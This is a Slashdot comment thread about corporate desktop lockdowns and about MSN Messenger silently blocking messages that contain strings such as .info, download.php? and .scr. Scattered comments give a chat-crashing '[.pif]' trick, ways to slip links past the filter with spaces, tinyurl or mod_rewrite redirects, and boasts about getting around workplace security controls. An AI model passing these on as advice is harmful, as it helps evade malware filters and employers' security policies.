In properly configured corporate environments, the users don't have the required permissions for spyware and most viruses to work either. The vast majority of viruses and spyware rely on moronic users running as an administrator.

Re:Blocked firefox.exe

[Kjella]

What if it steps on what I need to do my job?

Then you tell them it impacts your job, and if they don't listen then you do your job blindfolded with one hand tied behind your back if you have to. As long as it's equal for your coworkers it won't negatively impact your performance rating. I hear what you're saying about them sometime deciding things they don't need to, or just plain old being stupid but if you try telling the business it's not their business how work is performed, you're wrong.

Pushing the default start page and wallpaper is very common, it's usually about a) branding, b) it's not your computer, it's our computer and c) you might at least want to catch the headlines of what's happening on the intranet. Besides it might have avoided a quite funny incident I experienced where someone had to log in with someone else's account, his homepage was hardcore porn (probably set by some IE hack), if it'd been the states it'd be a free hostile work environment lawsuit. I've heard a few appriciate it if they can customize it, but never complain because they can't, really.

That said, the other things you mention leads me to believe your IT admins are idiots though I know I'm only hearing one side. But I still think they're in full right to manage the desktop the way they think most effectively serves the business. And if they're not doing their job, well that's a different thing that them doing what's not their job.

Re:Blocked firefox.exe

It's stories like yours that I like to print out and hang up to remind me why I work as a freelancer from home now.

The closest I could come to that from my Cubicle Hell days was a middle manager who suddenly one day developed a pathological obsession with keeping every computer background in the department set to the same plain color. It had to be EXACTLY #28E6FF or he'd have a fit. After getting chewed out for setting mine to a neutral gray once, my revenge was to write a script on random machines which slowly set the background color a single shade different, so that it would cycle through the palette in the course of about a year or two.

It didn't take long. I actually drove him to take a Poloroid photo of his own screen, cut a circle out of it, and drag a higher manager around by the tie all over the department with his color chip going, "Look! Look! This one's A SLIGHTLY DIFFERENT TINT!!!"

To a manager, no problem is too small.

Re:Blocked firefox.exe

[TheNetAvenger]

1) Don't they own the computers at your work?

2) What happens when you get malware from a Firefox exploit? (Lately it has been more on the hit list than IE)

3) Why would you jeopardize your employment just to run Firefox, as it would violate user guidelines and THEIR security policies?

Re:Blocked firefox.exe

The guy sitting in the cube bashing his keyboard in over an IE crash tends not to thing of it this way The next time I see Think confused with Thing , I swear I'm going to !$!@#^$!@#^&!@#@!%^#!@&$U^!#%@$

Re:Blocked firefox.exe

[AuMatar]

Bullshit. I have never, ever known someone to call helpdesk over a website not working. Hell, for that matter I've yet to work for a company with a helpdesk.

Re:Blocked firefox.exe

[innocent_white_lamb]

I have never, ever known someone to call helpdesk over a website not working
 
explains
 
  Hell, for that matter I've yet to work for a company with a helpdesk.
 
As it's impossible to call a non-existent helpdesk.
 
So your opinion is, therefore,
 
  Bullshit
 
as you are unqualified to express one in this situation.
 
Sorry, no cigar this time. Nice try, though.

Re:Blocked firefox.exe

[KingSkippus]

Odds are we know better than you...

Maybe, but I kind of doubt it. I was a NT server support person for a couple of years, then a systems admin (and a damned good one, if I do say so myself) for almost a decade. I've fought my fair share of battles, and my background is precisely why I know how to get around most of the shit they keep trying to push down to my workstation.

Some higher up executive, though, decided to bring it up... (blah blah blah)

Did you try to fight it? Did you tell your manager, "This is a bad idea, and here's why..."? Like I've said, I've fought my fair share of battles. I haven't won them all. I had to delete Solitaire and Minesweeper at a smaller company I worked at because, as my boss said, "I hate those stupid timewasters." However, when he had a meeting to tell us that he read that you could lock down the desktop background image, I explained to him why that was a bad idea, and actually won that battle.

At my last job before the one I have now, I was the manager of server operations. I hate to say it, but my boss was a complete idiot who didn't know a thing about managing an IT department. It was ridiculous, and on more than one occasion, I found myself in the CFO's office (his boss) explaining why what my boss had told him was a load of hooey. I ended up quitting because I literally was afraid that I would be prosecuted at some point for something my boss would make me do and pinned on me as a scapegoat, and a few months later, he was finally fired because he screwed up a license scheme and it cost the company over $100 thousand (a LOT of money for that company). While I was there, I actually deliberately disobeyed him on many occasions when he asked me to do things that were illegal and/or unethical.

But the desktop goobers where I am now? They don't just implement management's decisions. Believe me, I've talked to them on many occasions, and they actually defend what they've done. I know for a fact that they are the ones who are instigating a lot of this crap, because in my company, it's how you get ahead; you lead a project that costs hundreds of thousands of dollars and put together reports about how well it went. What? There isn't a project involving spending hundreds of thousands of dollars? Then you make one up.

So yeah, I guess I am one of those users. As a matter of fact, I do know more than most of our IT folks about how these systems work. And if they stand in the way of me doing my job, I'll go around them without an iota of guilt because frankly, what I'm doing is much more important then them locking down my home page and desktop background.

Re:Blocked firefox.exe

[Thomas+Shaddack]

You seem to be forgetting that the employees are people too. If you step on their personal wants beyond what's somewhat reasonable, you can't expect much loyalty. People are not slave labor anymore. They are not owned by the employers, even if the employers may be tempted to think otherwise. If you want an obedient workforce with no wants of their own, go to Japan and buy yourself some robots.

Re:Blocked firefox.exe

[syousef]

I'd be looking for work elsewhere if I was getting that stressed.

It's a balancing act of course though. Every place you work at, every change of management above you all the way to head honcho. Each time you'll get some things getting better and others getting worse. If they're all getting worse you look elsewhere.

Re:Blocked firefox.exe

[rohrb123]

I understand where you're coming from and won't attempt to defend your IT department's actions - completely. Poorly designed network, server, and backup schemes like that are inexcusable. It's quite obvious they're making problems worse instead of fixing them, and creating new ones. It's very simple to have computers turn on with WOL, run a virus scan at night, and turn back off with remote shutdown, and totally unnecessary for any background scans to be running during the day. And lack of storage space is probably the lamest excuse any IT department can come up with these days, with 1TB SATA drives under $400. We maintain 225GB of shared storage PER USER, and the costs were rather small, even for fibre channel.

However, I've found IT is sometimes used to take care of problems that are really the domain of management or HR, and in this case you generally have to focus on the lowest common denominator. Say you have an employee who's really, really good at what he does, and has gone above and beyond tasked duties a number of times for the company. His skill set alone makes him difficult to replace, especially at what he's currently being paid. However, he has the bad habit of coming in at 6AM and downloading porn on company computers, because he has a wife and kids at home. How did we find out? the startup page being changed to a porn site, as well as several minor adware installations. "Um I don't know how this happened!!" This was when we instituted several new technology policies, including a content-filter as well as a GPO-set home page. Fortunately our startup page only contains links to the most-used work related sites, and google. But it still pissed off people who wanted to catch the news headlines every time they opened their browser.

I've had similar issues with webmail, screensavers, backgrounds, partypoker, ebay, solitaire and similar programs, the list goes on. It's sad that many people can't get it through their heads that when they're at work they're being paid to work, not work when it's convenient for them. It's also sad that these problems have to be solved via technology instead of management addressing them directly. I've found that to be the origin of many IT "control" policies in my brief experience, and they only tend to make problems worse. You have a secretary in a cubicle who spends half an hour a day (paid) on myspace, and instead of her receiving some sort of formal reprimand, you're instructed to block myspace at the proxy server. She then wastes an hour per day - half of it trying to get around the filter with various proxies, the other half taking care of her social business. Management's response? "well, we'll lose more productivity firing her and training someone else than keeping her on", like there's no middle ground.

To me it seems like your company is attempting a piss-poor attempt at increasing productivity by decreasing the opportunities for distraction. They're probably the type who think their way of doing things is the most efficient and forcing that upon everyone else is a good thing (such as those custom folders brought up). I've been on the other side of that coin when an employee was having issues with yahoo directions, when we had a copy of mappoint 2k7 as well as google earth on their computer. It's tricky business, and sometimes it's difficult to foresee when you might step on a user's toes, especially the rare advanced user.

As for the rest of the stuff your IT department does, such as video sharing, well, erm, see article on using linux at work?

Re:Blocked firefox.exe

[Charles+W+Griswold]

Every day, my computer runs [. . .] Notes database replication [. . .]

They make you use Lotus Notes? Those bastards.

Re:Blocked firefox.exe

[Charles+W+Griswold]

Pushing down the default page via GPO sonuds pretty responsible to me. It helps prevent users default pages getting hijacked with porn sites, among other things. What does that even mean, hijacked? Does IE let random sites change your default page? Oddly enough, yes.

Re:Blocked firefox.exe

[Eivind]

Unlikely to be large costs though, the kind of user who knows enough to care which particular web-broweser he uses is also very likely to be clueful enough to, on the rare occasions when something doesn't work rigth because it's ie-code not standard html, fire up ie.

And when the costs are low, the "business reason" doesn't need to be a very vital one. Indeed, I'd expect in most cases "It is my prefered tool" should be sufficient. Worker satisfaction is also a factor. Workers are commonly unsatisfied at finding their everyday worklife filled with arbitrary restrictions and detail-control from on high.

Re:Blocked firefox.exe

[Ilgaz]

The working model of Firefox and IE are completely different on modern , widely used "Run application inside Webbrowser" kind of things.

What if company uses a intranet page for adding critical database records and because Firefox works in a different way, it breaks things? What if 1000 users installs Firefox in a single day? Can you imagine the offline time and the cost?

Re:Blocked firefox.exe

[Nintendork]

Apparently, they don't know how to administer their Windows network. Code can be permitted or blocked using an MD5 or SHA1 hash. See this article. Also, to those that complain about stupid IT decisions, I say this: Yes there is a lot of stupid IT decisions, but given the right network, security can be a top priority. I work at a credit card processing company. Keeping control over what code can be run, then maintaining those programs with patches and forced settings helps tremendously in keeping the network safe. An ex girlfriend works at Lockheed Martin on special projects. She doesn't get an internet connection. She's not permitted to carry in a cell phone. Now a small shop that has absolutely zero hack factor doing these kinds of things is ridiculous. As long as they're protected from drive-by vuln scans, have an AV solution, and keep malware under control, that's almost always enough. Dreaded power users that find all sorts of fun ways to fuck their computer can be kept under control at a management level.

Re:Blocked firefox.exe

[soliptic]

Call me crazy, but couldn't you... um... leave?

Your place just sounds idiotic to me. I don't think I [c|w]ould tolerate it.

I come in at about 10, wearing whatever I want, fire up Firefox, cruise around the (unfiltered) internet for a bit, ooh, I need to do some vector graphics today, I'll install Inkscape and see what that's like...

Sure, the pay isn't all that great compared to Big Corporates-ville (which is what I'm guessing your place is), but it's worth it to me to work in a place populated by sane people doing things because it helps the overall aim of the organisation, not insane people doing insane things for the sake of it.

Re:Blocked firefox.exe

I feel for you King Skippus. I'm on an IT staff and from the sound of it, you have a really piss poor IT department. Any IT staff that can't really manage their departments without having these dumb restrictive policies suggest that they are not on the ball in regards to desktop support. I can only suspect that your IT staff is full of paper MSCE's with no real experience at computing. Overly restrictive policies are usually a sign of an utter lack of skill on the management side of things, and this is certainly not restricted to technology industries or departments.

As a sysadmin, my job is to make my clients' work easier, not harder. My only gripe with the people I support now is that they don't always tell us immediately when something doesn't work. A good sysadmin will find ways to solve problems so that employees don't have to hack around things as you have. There really is no need for certain restrictions that you've encountered.

The corporate video idea seems ludicrous. Sucking up bandwith just to have video seems to limit overall productivity. What happened to having a dedicated server with proper bandwidth. As for the Connected Backup software, I suspect it's caused by that crap Sarbanes-Oxley(sp?) law that requires all corporations to back up everything, including employee's workstations. I probably would just run a script, on both unix and on Windows(yes it can be done) to collect everything off hours. Any modern computer can be set to wake on lan or automatically start at certain hours. Even systems 7 years old have this ability(If your company runs anything older than 5 years old for a desktop you should look for a new place of work. It's a whole other story if these are special dedicated systems.).

Connected Backup probably allows them to say they've obeyed Sarbanes-Oxley. As for the other so-called IT staff who responded against you. Seems like they're just griping because they don't have "control" over you.

FWIW, I've been on both sides of the fence. I've programmed and I've sysadmined, so I understand what users and sysadmins are like. I wanted to do hardware ages ago, but the jobs weren't there when I graduated, so I got a job programming first; there was a slump that one year. Later, the sysadmin quit, and in lieu of hiring a new one they handed it over to me, since I already knew how to do the work. There are quite a number of intelligent people as well as utter dunces in both camps.

Unfortunately, encounters with the dunces happen far more frequently. The intelligent ones usually don't ask for or need any help or cause any problems. On the other hand, I also worked as a systems integrator/installer and those companies that I got sent to had utterly clueless so-called sys-admins. I installed our servers and had to help them integrate their Windows, Mac and unix systems together. Then again, that's probably why our company was hired to do the work in the first place. I wonder what the ratio really is.

P.S. As for that blocking of firefox, what utter retards of sys-admins. They should just maintain a new updated copy and push it out along with IE patches. It's not that difficult. I would easily figure out my way around it as you have. I wonder if they blocked Opera too. I personally would prefer to remove IE, but I don't. It's not my job to deny the choice. It's my job to make sure the systems work.

Re:Blocked firefox.exe

[ACMENEWSLLC]

They are getting sneakier. We have a very tightly locked down set of public user machines. We use Microsoft's software to do this. It's worked well for years. But what we are seeing is that these applications will install into the %temp% directory or the desktop. They will use HKCU if they need to store things in the registry. They are installing into area's that users typically have full control over.

We've locked down the users HKCU and personal directories on these machines, as well as limit access to processes iexplorer.exe and a few others. But the fact is they are getting more creative.

experience

definitely they do this.

I remember I was trying to send the link to OldApps.com to a friend via MSN IM, and it just wouldn't deliver it.

AC: Here's the link:::
AC: http://www.oldapps.com/
friend: ??
AC: did you got it?
AC: http://www.oldapps.com/
AC: http://www.oldapps.com/
friend: dude? wtf?
AC: God damn it... I'm sending it!
AC: http://www.oldapps.com/
friend: ur a n00b

So I tried downloading the file my self, then sending him (file transfer) to him... and he just wouldn't receive the file transfer window/request.

Stupid MS.

Re:experience

Does www.oldversion.com work?

Different site, similar content.

Re:experience

[someone1234]

Next time try this: ht tp://www. oldapps. com/ And tell your friend to omit spaces.

I already knew some

[alx5000]

Since the day I became almost crazy when I was trying to pass a URL which included 'download.php?' to a friend from a well trusted website. All of my messages sent back to me. PITA.

Fortunately, it's kinda easily fooled if you randomly place a space and add "delete the space" at the end of the sentence. If they trust me in the first place, what prevents them from copy-pasting it and deleting a character as I requested?

Re:I already knew some

[Jeff+DeMaagd]

It's not even a matter of trust, some people will follow instructions without asking why they are doing this. So your trick could be used to spam people and you'll get a lot of people that will do what you ask. It's even easier if you can tell people that the link goes somewhere that they might want to go, like cheap software, porn, cheap medicine, etc.

Re:I already knew some

[mattpointblank]

Yeah. My friend was trying to link me to someone's Facebook profile and we both got frustrated as he insisted he'd sent me the link and I could not see it. We had to resort to email. And the girl wasn't even that hot.

the list

• .info
• profile.php? (including ?)
• download.php? (including ?)
• gallery.php
• pics.php
• ListAllTopics.php
• .scr

Reminds me...

[free+space]

Some time in 2002, if I remember, I wanted to make my MSN Messenger nickname a Microsoft related joke, only to find the client preventing me with a message that says:

"A part of your nickname contains trademarked words and thus cannot be used".

I changed "Microsoft" to "Micro Soft" but it just wasn't the same :(

I've run into this issue before

[deftcoder]

I had tried to send my friend a link to a website like site.com/staff.php, and gaim said "blah blah received an error from the MSN switchboard".

Another thing to note: you used to be able to crash people out of chats by typing "[.pif]" (without quotes). It would cause everyone to exit the conversation with a "connection error". Now, it just kicks you out.

Re:I've run into this issue before

Another thing to note: you used to be able to crash people out of chats by typing "[.pif]" (without quotes). It would cause everyone to exit the conversation with a "connection error". Now, it just kicks you out.

In Soviet Russia... oh, never mind.

Re:I've run into this issue before

[SanityInAnarchy]

Yeah, on my Kopete, on the sending end, it lags for maybe 20 seconds (though maybe that's because I'm downloading something, but I suspect it's deliberate), then says "connection closed" and warns me that the message wasn't sent correctly.

On the receiving end, it just tells me that I closed the chat window.

Misleading headline

[noidentity]

This isn't censorship; it's just a poor firewall. The difference is that the former is for stifling human communication, while the latter is to protect machines from malicious software.

Re:Misleading headline

[jamie]

No, the data which is being blocked from transmission is not blocked because it's going to a computer program which would be exploited by it. At least I haven't seen any allegations of that. It's being blocked because the human that would receive the data might use it in a way deemed inappropriate (by clicking on it, say).

Re:Misleading headline

[jez9999]

Are you the guy that Slashdot hired to start correcting all the inaccurate stories and comments posted here?

Re:Misleading headline

[GalionTheElf]

Completely OT but what is that little /. icon I can see next to the friend/foe marker? Is that a new thing or am I just spectacularly dense? Also, what is it for? Surely if I'm reading the comments here I know how to find the front page? ;)

TIA if you find the time to answer these burning questions. Inquiring minds need to know!

Re:Misleading headline

[TheRaven64]

It means he is a member of the Slashdot staff. You don't see them very often because only half a dozen or so people have them, and judging by the dupes not many of those actually read the site.

Re:Misleading headline

Thanks. Makes sense I guess, must be like the nerdiest badge of honour evar.

Re:Misleading headline

[jZnat]

Don't forget the little eye icon that means they're a part of the OSTG staff. Roblimo is the only one I've seen with that icon, but there could be others.

Re:Misleading headline

Which is why they should turn the fucking link parsing off! Drives me insane. Try selecting (to copy) just a portion of a link you receive on MSN, and see what I mean.

Re:Misleading headline

[Emperor+Cezar]

I agree that this isn't "censoring", it's stupid, it's a lazy way to protect against virii, but it's not censorship. To call it such weakens the definition and power of the word censorship and makes it look like the community is being knee-jerk and unreasonable, weakening any argument.

Re:Misleading headline

[pimpimpim]

since when is clicking on a link deemed inappropriate? Isn't that what links are for?

Re:Misleading headline

[jamie]

You must be new here :)

Re:Misleading headline

You can add a space in the url or just say "add php on the end" in the message.

It would of been better to just disable those urls as clickable in MSN, rather then have people spend time wondering wtf is going on with the MSN connection.

Forgot to say...

[free+space]

For those who don't have MSN: They changed their mind and it can be done now.

Re:Forgot to say...

>For those who don't have MSN: They changed their mind and it can be done now.
Gosh, thanks for the update - I know that I couldn't have slept tonight not knowing that.

Fix "automatically run code based on text message"

That might be a good start - don't automatically do whatever some random dolt at the other end of a a few TCP connection hops implies you should. Running code just because it was sent to you in a link is downright fucking stupid, yet M$ does it automatically.

Then, fix the rampant security holes in the entire OS that allow someone running as a random user to totally hose the entire OS installation. In other words - get where Unix was, oh, about twenty or thirty years ago.

The fact that M$ has disabled their own apps and OS from doing what they coded it to do is proof that their entire approach to developing software results in insecure products. Time and time again, we see that's true. This is just another example. Why do you "hate" someone who is merely pointing that out?

Priorities and mitigation

[Fastolfe]

Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place: it's not like IM is the only place a URL can get on your machine.

Do you really think they're diverting resources away from fixing bugs so that they can add "censorship" features to IM? Perhaps this is just one effort among multiple efforts to correct problems AND mitigate their effects? If it's going to take X weeks to fix the bug, but Y days to implement a filter that will stop some large percentage of infections, don't you think that both avenues are worth exploration at the same time? There's more to slowing and preventing the spread of malware than fixing the defect that allows them to propagate.

This also assumes that the same organization even owns the bug in question. Not all of these defects may be Microsoft's problem to begin with. This might even be a MORE reasonable action for them to take, since they're doing "everything in their power" to fight the problem rather than just sitting on their hands waiting for a 3rd-party to correct their bug, and sitting on their hands longer waiting for the end user to update their software.

Re:Priorities and mitigation

[RAMMS+EIN]

``Do you really think they're diverting resources away from fixing bugs so that they can add "censorship" features to IM?''

Yes.

``Perhaps this is just one effort among multiple efforts to correct problems AND mitigate their effects?''

That sounds almost reasonable. Except that it implies that Microsoft actually makes a serious effort to fix the security holes they've saddled their users with. I had some hopes that, with Vista, they had actually started down that road, but these hopes have since been thoroughly dashed. Microsoft aren't and have never been serious about the security of their users.

This is not part amond "multiple efforts to correct probems AND mitigate their effects", this is a lame cop-out.

``If it's going to take X weeks to fix the bug, but Y days to implement a filter that will stop some large percentage of infections, don't you think that both avenues are worth exploration at the same time?''

Yes, but that's not what's happening. What's happening is that Microsoft is censoring their IM service. I believe this is in a sincere effort to slow the spreading of malware over MSN, but that doesn't mean it's a Good Thing. For one thing, it also degrades the usabiltiy of the service for legitimate purposes. For another, it doesn't _actually_ stop the malware. What it does is erect some barrier. In that sense, it's not very different from the bazzilions of "Are you sure?" dialogs that Microsoft software is full of. Except that these dialogs _could_ actually help educate users, if said users would bother to read and learn. Blocking certain messages just annoys legitimate users of the service. The filter will be bypassed. After that, everything is as it was, except less usable. And in the meantime, Microsoft introduces new security holes and lets other holes linger.

Oh, and did you realize that this censoring (which really has been going on for months if not years now) can also be used as a stepping stone to censoring things that Microsoft considers harmful, even if the users would likely find them bona-fide? I've already had several of my messages blocked by the filters, and I assure you they did not in any way relate to malware. Perhaps a few cases of open-source software, though.

``There's more to slowing and preventing the spread of malware than fixing the defect that allows them to propagate.''

Sure. And I do believe this is a sincere effort to protect MSN users. I just think the cure is worse than the disease.

Re:Priorities and mitigation

[SeaFox]

Do you really think they're diverting resources away from fixing bugs so that they can add "censorship" features to IM?

Is this a joke question? We're talking about Microsoft, the company that leaves security holes in their products for months on end while churning more DRM into it.

Re:Priorities and mitigation

[Fastolfe]

For one thing, it also degrades the usabiltiy of the service for legitimate purposes. For another, it doesn't _actually_ stop the malware.

Sure, it degrades the usability of the service somewhat. Just like "barrier" that is airport security degrades the usability of airline travel. It does, in fact, stop malware that uses that vector for propagation. Is it a permanent solution to the malware problem? Of course not. As you say, the people creating malware will adapt, and the "fix" would be ineffective against malware that infects through some other mechanism. But the point of my post was that this could be a short-term fix while a long-term solution is under development. It would completely eliminate the ability of this malware to spread while giving the company the necessary time to fix, test and deploy a solution without operating in "emergency mode" all the time.

Yes, but that's not what's happening.

And you know this.. how?

I don't understand why people act as though the concept of a cost-benefit analysis is some strange or evil thing Stop acting like a rabid anti-Microsoft troll for a moment and look at the problem rationally, from a business perspective. Businesses must be cost-effective in everything that they do. Pulling out all of the stops and blowing wads of cash all the time will put you out of business fast, and then where would your customers be?

Oh, and did you realize that this censoring (which really has been going on for months if not years now) can also be used as a stepping stone to censoring things that Microsoft considers harmful, even if the users would likely find them bona-fide? I've already had several of my messages blocked by the filters, and I assure you they did not in any way relate to malware. Perhaps a few cases of open-source software, though.

Conspiracy theory.

With so many alternatives..

[bealzabobs_youruncle]

why use MSN at all?

Re:With so many alternatives..

If I could choose, I would use only IRC and maybe Jabber if an IM-style protocol is absolutely needed. However, MSN is very popular around here and converting everyone I need to communicate with to the alternatives is just not possible.

I don't need to use the official client, but sadly I must use some kind of program that connects to the MSN network now and then.

Re:With so many alternatives..

[lordtoran]

Because you cannot convince everyone you know to install a decent multi protocol messenger. Some less tech savvy folks in my contact list are too afraid to lay hands on their machine and will panically stick with whatever came on it preinstalled (in most cases, Windows with MSN Messenger). So I still have to keep that MSN account, although I strongly prefer Yahoo over it (for its great support in Kopete).

Re:With so many alternatives..

[kwark]

So use a jabber server that has transports to legacy networks.

But since you like IRC you might have use for http://www.bitlbee.org/

Re:With so many alternatives..

So use a jabber server that has transports to legacy networks.
But since you like IRC you might have use for http://www.bitlbee.org/ I'm aware of these possibilities, but in any case to communicate with the people using only MSN, I need to connect to the network one way or another. Yeah, I can do it indirectly through the methods you described, but I would still be using the MSN network in the end, I would still be affected with this censoring since it's a server side thing, and Microsoft would still be reading my messages ;)

Re:With so many alternatives..

[kwark]

But this way you can show the legacy IM users the power of your preferred method/client, including the backwards compatibility.

Don't forget to tell your MSN users that you can't send anything confidential over that network (the last time I did some wireless sniffing MSN wasn't even encrypted, allowing me to spy on IMs (that was before the latest MSN live thingy though))

Re:With so many alternatives..

[DarkVader]

It's a legitimate question, not offtopic at all when you're talking about an IM service that is censoring user conversations.

Somebody please mod parent up.

I use iChat/AIM , iChat/Jabber and Yahoo - and I won't get a M$N account. I tell people that if they want to IM me they can use something other than M$N, as I won't be getting an account there.

.INFO

[tverbeek]

I don't suppose it's occurred to Microsoft that .info is a perfectly valid TLD used by a significant number of legitimate web sites, and a perfectly appropriate string to include in an IM discussion.

Re:.INFO

[SRA8]

Ah...no wonder these .info domains sell so cheap...!

Re:.INFO

I don't suppose it's occurred to Microsoft that .info is a perfectly valid TLD used by a significant number of legitimate web sites, and a perfectly appropriate string to include in an IM discussion.

You are correct.

However, legitimate .info domain names are extremely rare. So rare, that my antispam software tells me that the probability of an url containing a .info domain name being found in legitimate email is about 1%. An url containing .info is a pretty good indicator that a message is spam (yes, false positives & negatives will occur - I'm talking on average).

Now, that's my email, yours may differ.

I suspect the reason may have something to do with the very low price for .info domain names.

Re:.INFO

[beware1000]

I own three domains, a .net, .org and .info with three completely unrelated names.

two out of three of them are blocked on msn.

Re:.INFO

[shish]

.info is a perfectly valid TLD used by a significant number of legitimate web sites Since when o_O?

Re:.INFO

[kyrio]

Since three years ago.

Re:.INFO

[shish]

Three years ago it became a perfectly valid TLD, but I would think that if it were "used by a significant number of legitimate web sites", chances are I would have seen *one* of them. As it is, the only time I've *ever* seen .info used is in spam emails and link farms.

Re:.INFO

[kyrio]

Look harder.

Re:.INFO

[shish]

If I need to specifically go out and look for a non-spam .info, then they obviously aren't common :P

.com

Do they block those scary executable .com files too?

MSN does some weiiiiiird things...

[jez9999]

Here's one it started doing since the recent MS security drive. Any file that could possibly exploit a hole in any piece of software seems to be treated with serious suspicion. Somehow, this seems to include GIF files. So, when someone tried to send me a GIF file, I get this warning. I download it anyway, and it's sitting on my hard drive. I can copy it somewhere else, open it, etc.

However - and this is the kicker - when I click on the blue link to the file in the MSN chat window, I get this dialog. Yeah, it actually DELETED the file I just downloaded. After I copied it using Explorer. And I have full access to it. Dunno who implemented that piece of genius.

Re:MSN does some weiiiiiird things...

[sentientbeing]

That Microsoft crackden 'feature' is one big pain in the ass! Damn. The hassle Ive had with that fucking policy. How do you turn it off?

Re:MSN does some weiiiiiird things...

[tepples]

That Microsoft crackden 'feature' is one big pain in the ass! Damn. The hassle Ive had with that fucking policy. How do you turn it off? One way is to install Ubuntu, but it's not for everyone.

Re:MSN does some weiiiiiird things...

[gardyloo]

Yep, that's astoundingly annoying. IIRC, you can do a "Save To..." instead of allowing MSN to choose where to save it. Then it doesn't get deleted.

Re:MSN does some weiiiiiird things...

[snillfisk]

My MSN Messenger currently thinks that all MP3-files should be treated that way.. Quite ingenious the first time someone sent me some music they've made and voilá, all gone after the transfer (because we all know how fast MSN Messenger is at sending files)..

This issue was brought to my attention a while back when they blocked _all_ links containing download.php. Yep. Not sure if they still do that, tho.

Re:MSN does some weiiiiiird things...

[Pulse_Instance]

You're a fucking tool, he didn't ask how do I get rid of Windows because of their numerous retarded practices he asked how to turn off a single feature in MSN. To install Ubuntu doesn't help him at all if you were to tell him to install other MSN protocol IM clients such as Pidgin, Trillian or something else then you could have moved them slowly towards open sourced software and made the switch go easier, not that I really would recommend Trillian and I haven't played with Pidgin yet. The best course of action however would have been to not click the reply button because your answer had absolutely no relevance to the question he was asking.

Re:MSN does some weiiiiiird things...

[Esteanil]

The file isn't deleted until you press the "OK" button, so when you see that awful message you still have time to open explorer and copy/move the file.
I'll leave the subject of how unbelievably retarded the whole thing is to others.

Re:MSN does some weiiiiiird things...

[Grimbleton]

Mr. Pot? I believe Mr. Kettle has some strong words for you.

Re:MSN does some weiiiiiird things...

[wica128]

For now you can not turn it off, but you can switch IM. gtalk is I think a good option

Re:MSN does some weiiiiiird things...

[SanityInAnarchy]

Yes, they do. Just tested it.

They don't just block the link, either -- they lag your connection for about 20 seconds, then kill the conversation. I'm not sure how it looks to a real MSN client, though.

Re:MSN does some weiiiiiird things...

[SanityInAnarchy]

First, punctuation is your friend it's really fucking annoying to read long sentences like this are you too fucking lazy to include a period and break it into multiple sentences or what fucking moron.

That said:

To install Ubuntu doesn't help him at all.

Yes, that is a complete sentence. You put a period there. The first letter of the next word is capitalized. Go back to grade school and learn to fucking write.

Anyway, I'd think that installing Ubuntu does help, as at that point, you're forced to find something like Pidgin -- I think Pidgin (or Gaim) might actually be included in the default install. I know Kopete is in the default Kubuntu install, and I find it a bit better -- it has webcam support, for one.

Overkill? Yes, but it would work. Is your way better? Maybe, but you chose to bitch at someone for suggesting Ubuntu, instead of replying directly to the person who had the problem.

Re:MSN does some weiiiiiird things...

[dyftm]

A real kick in the teeth is that method will delete MP3s, but not WMAs, which have much more potential to do harm (eg to open up a website of the attacker's choosing). Political decision? No way...

Re:MSN does some weiiiiiird things...

[tepples]

he didn't ask how do I get rid of Windows because of their numerous retarded practices he asked how to turn off a single feature in MSN. I misunderstood whether he was complaining about the one feature or about the whole Windows mindset. In the case of complaining about one feature, Pidgin for Windows should do the trick. The advantage of Pidgin or other multi-protocol clients is that if you can get both you and your contacts on such a client, you can switch to Jabber protocol, which has no any MSCensorship at all. It will also make things easier when you do decide to try L*n?x.

Re:MSN does some weiiiiiird things...

[MaXimillion]

That is a real PITA, especially since it also applies to MP3 files. Luckily, the list of filetypes it blocks can be altered through registry, although I'll be damned if I can remember which key it was.

Re:MSN does some weiiiiiird things...

>Yeah, it actually DELETED the file I just downloaded.
An especially painfull case of this was when I transfered the latest BF2 full patch(1,5GB or so) to a buddy over MSN(in order to exploit the 100Mbps speed of the lan rather than the 10Mbps internet conection).

umhuyk

Re:MSN does some weiiiiiird things...

[bcmm]

I did this in both 2-person and group chats, with people who were using the official client. They see the other person ending the convo. In a group chat, every participant sees all the other participants leave at once.

IIRC there are a few other fun blocked words, but I've forgotten them.

So...

[Perseid]

...as a web developer I need to find a new IM service? Great move. :P

Re:So...

[ChakatSanddancer]

Use yahoo. It interoperates with MSN for the few people unwilling to switch, but for most people, you don't have to worry about the spying.

Re:So...

[boarsai]

The ASP extension has no issues associated... coincidence? Mayaps they'd prefer you to code in something other then php... hrmmmmn. Yes, I am wearing a tin foil hat... why?

And if they didnt

[nurb432]

The first person that got infected wiht something would bitch that Microsoft didn't do enough.

Not that im fond of them either, but it seems they cant win either way these days.

Re:And if they didnt

[SanityInAnarchy]

Well, it depends who they want to piss off.

Personally, I'd much rather piss off the one moronic user by not protecting them from themself -- it's their fault anyway. In fact, this probably happened, which is probably why they added these "features" in the first place.

Instead, they've chosen to piss off everyone who sends a URL with a php extension (webcomics, Bash quotes, etc come to mind), and everyone who knows about the issue.

And for what?

So that some clueless morons are protected from other clueless morons. So that you're protected from any virus/worm/"hacker" who doesn't know about tinyurl.com (or any of the numerous other ways around that filter).

Losing battle...

[MalHavoc]

It's pretty much impossible to block everything. If someone really wants to send you a link to something that will infect (or try to infect) your computer, there are tons of ways to do it. The tinyurl example has already been mentioned, but every single Apache server out there comes with things like mod_rewrite or Redirect directives that can send innocuous URLs to the intended malicious URL. In the case of mod_rewrite, you can do it without even changing what the browser displays, so users don't even know they evaded (or didn't, as the case may be) an infection attempt.

At least they're doing something

[Deathlizard]

Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place

At least their trying something (albeit a weak approach) to stop automated scripts from sending viruses all over their chat protocol.

When you work on 1000+ college student laptops, you learn a lot of things about software students use in general, and one of these things you learn is:

1) AIM is a Virus downloading service disguised as a chat protocol.

I know that AOL doesn't do this on purpose, but it is so easy to hack that it might as well be. it's great when a 12 year old downloads a virus that infects Aim thinking it was some game (probably from AIM i might add), it sends "Hey check this out!" to his sister at the college containing an infected link or program, and the next thing you know you're running Aimfix and cleaning Zlob off on 300 PC's.

If Aim would simply filter out the bad traffic (and they should be able to know if a client is spamming the servers like crazy by heuristics alone) it would stop a lot of scams dead in their tracks.

Re:At least they're doing something

[BenoitRen]

The same thing can be done to MSN. A couple weeks ago my brother alerted me to a new MSN virus that sends itself with the message "nude pics of my friend look!".

Re:At least they're doing something

[SanityInAnarchy]

1) AIM is a Virus downloading service disguised as a chat protocol.

I understand your frustration, but that's even more nonsensical a statement than "The Internet is for Porn!"

If Aim would simply filter out the bad traffic (and they should be able to know if a client is spamming the servers like crazy by heuristics alone) it would stop a lot of scams dead in their tracks.

